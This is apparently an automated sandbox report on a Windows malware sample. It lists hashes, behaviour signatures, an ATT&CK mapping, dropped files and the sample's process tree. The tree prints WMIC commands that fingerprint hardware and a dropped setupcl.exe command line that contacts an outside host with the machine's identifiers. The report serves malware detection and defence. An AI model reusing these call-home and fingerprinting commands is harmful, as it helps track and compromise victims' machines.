05f2856124679b861875bc9f8b77f9f6516310c6ff8726892cd29d43304b24f6

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
26/12/2023, 03:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4ea3410b46d87548c7ef3f01e989b65c.exe
Size

406KB
MD5

4ea3410b46d87548c7ef3f01e989b65c
SHA1

cd33fce4dbeffc5279c2f7a19813d689b29f9bfe
SHA256

05f2856124679b861875bc9f8b77f9f6516310c6ff8726892cd29d43304b24f6
SHA512

e6b3480e7a8ceaa0b2fac3d734d376f4c85bc8a797662b7ec20c2be544a8b4916b517e8042942e835b616b95eef2e04582d1fbf5132715b80cbc7bb95c729f86
SSDEEP

12288:MA0i50GnxVCxlXoRRZdCwxu6L6sRME4Evot7556I0:MAfyGxVCxlY1ddJPME4lt7zS

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1960	7za.exe
1616	setupcl.exe

Loads dropped DLL 12 IoCs

pid	Process
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
756	4ea3410b46d87548c7ef3f01e989b65c.exe
2520	WerFault.exe
2520	WerFault.exe
2520	WerFault.exe
2520	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process
2520	1616	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1636	WMIC.exe
Token: SeSecurityPrivilege	1636	WMIC.exe
Token: SeTakeOwnershipPrivilege	1636	WMIC.exe
Token: SeLoadDriverPrivilege	1636	WMIC.exe
Token: SeSystemProfilePrivilege	1636	WMIC.exe
Token: SeSystemtimePrivilege	1636	WMIC.exe
Token: SeProfSingleProcessPrivilege	1636	WMIC.exe
Token: SeIncBasePriorityPrivilege	1636	WMIC.exe
Token: SeCreatePagefilePrivilege	1636	WMIC.exe
Token: SeBackupPrivilege	1636	WMIC.exe
Token: SeRestorePrivilege	1636	WMIC.exe
Token: SeShutdownPrivilege	1636	WMIC.exe
Token: SeDebugPrivilege	1636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1636	WMIC.exe
Token: SeRemoteShutdownPrivilege	1636	WMIC.exe
Token: SeUndockPrivilege	1636	WMIC.exe
Token: SeManageVolumePrivilege	1636	WMIC.exe
Token: 33	1636	WMIC.exe
Token: 34	1636	WMIC.exe
Token: 35	1636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1636	WMIC.exe
Token: SeSecurityPrivilege	1636	WMIC.exe
Token: SeTakeOwnershipPrivilege	1636	WMIC.exe
Token: SeLoadDriverPrivilege	1636	WMIC.exe
Token: SeSystemProfilePrivilege	1636	WMIC.exe
Token: SeSystemtimePrivilege	1636	WMIC.exe
Token: SeProfSingleProcessPrivilege	1636	WMIC.exe
Token: SeIncBasePriorityPrivilege	1636	WMIC.exe
Token: SeCreatePagefilePrivilege	1636	WMIC.exe
Token: SeBackupPrivilege	1636	WMIC.exe
Token: SeRestorePrivilege	1636	WMIC.exe
Token: SeShutdownPrivilege	1636	WMIC.exe
Token: SeDebugPrivilege	1636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1636	WMIC.exe
Token: SeRemoteShutdownPrivilege	1636	WMIC.exe
Token: SeUndockPrivilege	1636	WMIC.exe
Token: SeManageVolumePrivilege	1636	WMIC.exe
Token: 33	1636	WMIC.exe
Token: 34	1636	WMIC.exe
Token: 35	1636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2256	WMIC.exe
Token: SeSecurityPrivilege	2256	WMIC.exe
Token: SeTakeOwnershipPrivilege	2256	WMIC.exe
Token: SeLoadDriverPrivilege	2256	WMIC.exe
Token: SeSystemProfilePrivilege	2256	WMIC.exe
Token: SeSystemtimePrivilege	2256	WMIC.exe
Token: SeProfSingleProcessPrivilege	2256	WMIC.exe
Token: SeIncBasePriorityPrivilege	2256	WMIC.exe
Token: SeCreatePagefilePrivilege	2256	WMIC.exe
Token: SeBackupPrivilege	2256	WMIC.exe
Token: SeRestorePrivilege	2256	WMIC.exe
Token: SeShutdownPrivilege	2256	WMIC.exe
Token: SeDebugPrivilege	2256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2256	WMIC.exe
Token: SeRemoteShutdownPrivilege	2256	WMIC.exe
Token: SeUndockPrivilege	2256	WMIC.exe
Token: SeManageVolumePrivilege	2256	WMIC.exe
Token: 33	2256	WMIC.exe
Token: 34	2256	WMIC.exe
Token: 35	2256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2256	WMIC.exe
Token: SeSecurityPrivilege	2256	WMIC.exe
Token: SeTakeOwnershipPrivilege	2256	WMIC.exe
Token: SeLoadDriverPrivilege	2256	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1616	setupcl.exe
1616	setupcl.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 1636	756	4ea3410b46d87548c7ef3f01e989b65c.exe	19
PID 756 wrote to memory of 1636	756	4ea3410b46d87548c7ef3f01e989b65c.exe	19
PID 756 wrote to memory of 1636	756	4ea3410b46d87548c7ef3f01e989b65c.exe	19
PID 756 wrote to memory of 1636	756	4ea3410b46d87548c7ef3f01e989b65c.exe	19
PID 756 wrote to memory of 2256	756	4ea3410b46d87548c7ef3f01e989b65c.exe	32
PID 756 wrote to memory of 2256	756	4ea3410b46d87548c7ef3f01e989b65c.exe	32
PID 756 wrote to memory of 2256	756	4ea3410b46d87548c7ef3f01e989b65c.exe	32
PID 756 wrote to memory of 2256	756	4ea3410b46d87548c7ef3f01e989b65c.exe	32
PID 756 wrote to memory of 2604	756	4ea3410b46d87548c7ef3f01e989b65c.exe	22
PID 756 wrote to memory of 2604	756	4ea3410b46d87548c7ef3f01e989b65c.exe	22
PID 756 wrote to memory of 2604	756	4ea3410b46d87548c7ef3f01e989b65c.exe	22
PID 756 wrote to memory of 2604	756	4ea3410b46d87548c7ef3f01e989b65c.exe	22
PID 756 wrote to memory of 2568	756	4ea3410b46d87548c7ef3f01e989b65c.exe	31
PID 756 wrote to memory of 2568	756	4ea3410b46d87548c7ef3f01e989b65c.exe	31
PID 756 wrote to memory of 2568	756	4ea3410b46d87548c7ef3f01e989b65c.exe	31
PID 756 wrote to memory of 2568	756	4ea3410b46d87548c7ef3f01e989b65c.exe	31
PID 756 wrote to memory of 1960	756	4ea3410b46d87548c7ef3f01e989b65c.exe	26
PID 756 wrote to memory of 1960	756	4ea3410b46d87548c7ef3f01e989b65c.exe	26
PID 756 wrote to memory of 1960	756	4ea3410b46d87548c7ef3f01e989b65c.exe	26
PID 756 wrote to memory of 1960	756	4ea3410b46d87548c7ef3f01e989b65c.exe	26
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 756 wrote to memory of 1616	756	4ea3410b46d87548c7ef3f01e989b65c.exe	30
PID 1616 wrote to memory of 2088	1616	setupcl.exe	29
PID 1616 wrote to memory of 2088	1616	setupcl.exe	29
PID 1616 wrote to memory of 2088	1616	setupcl.exe	29
PID 1616 wrote to memory of 2088	1616	setupcl.exe	29
PID 1616 wrote to memory of 2520	1616	setupcl.exe	28
PID 1616 wrote to memory of 2520	1616	setupcl.exe	28
PID 1616 wrote to memory of 2520	1616	setupcl.exe	28
PID 1616 wrote to memory of 2520	1616	setupcl.exe	28

C:\Users\Admin\AppData\Local\Temp\4ea3410b46d87548c7ef3f01e989b65c.exe
"C:\Users\Admin\AppData\Local\Temp\4ea3410b46d87548c7ef3f01e989b65c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:2604
- C:\Users\Admin\AppData\Local\Temp\nstCCF.tmp\7za.exe
  7za.exe e -y -p"2cd24a7b64b7c4e97fbf5a80af4e1123" [RANDOM_STRING].7z
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Users\Admin\AppData\Local\Temp\nstCCF.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nstCCF.tmp\setupcl.exe" /initurl http://sub.nuidal.info/init/4ea3410b46d87548c7ef3f01e989b65c/:uid:? /affid "-" /id "0" /name " " /uniqid 4ea3410b46d87548c7ef3f01e989b65c /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1616
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2568
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 372
1⤵
- Loads dropped DLL
- Program crash
PID:2520

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic bios get serialnumber, version
1⤵
PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nstCCF.tmp\7za.exe

Filesize
381KB

MD5
c05252cf82fa42a594c12e9805087789

SHA1
c9d904cf43a32501202611e65d398e39b8bc492f

SHA256
7dd366d0215a64b8823bba22ec2ec6335b0427bfb34ee76fd4f95e6d822c77a2

SHA512
44d52dee87d9c457afe30b85d187b2f294a3cc6ecfd0f14fc096dc32912c0ba148ed1ab22a211eb97ebbd76c82e512cedd03287301a09e6158498169da42cd77

Download Submit
\Users\Admin\AppData\Local\Temp\nstCCF.tmp\7za.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
\Users\Admin\AppData\Local\Temp\nstCCF.tmp\nsExec.dll

Filesize
8KB

MD5
b8be6632a7dc8136ff01338be40fe701

SHA1
043fa16929b2af5ed5c1c59b4035a10cf765fb43

SHA256
289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

SHA512
403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

Download Submit
\Users\Admin\AppData\Local\Temp\nstCCF.tmp\setupcl.exe

Filesize
92KB

MD5
c39ec84e4377732c9ad54bd4f45b45b4

SHA1
e1e803862ec9bf149814d5df613c812d9f1b2774

SHA256
409ca1359ba38f47f686abd20e19193ef1779bf7d8d31d6798b4246f9ace7960

SHA512
c6c3c98ce1cfa57cf7ecd31675942e3e2a60aa480f8920a41a5bd33f17d773c16e929829c072c2e566e42446c53f42f580d142160bd773307e674ef5bed72038

Download Submit
memory/756-41-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1616-42-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1616-43-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1616-44-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1616-49-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1616-50-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download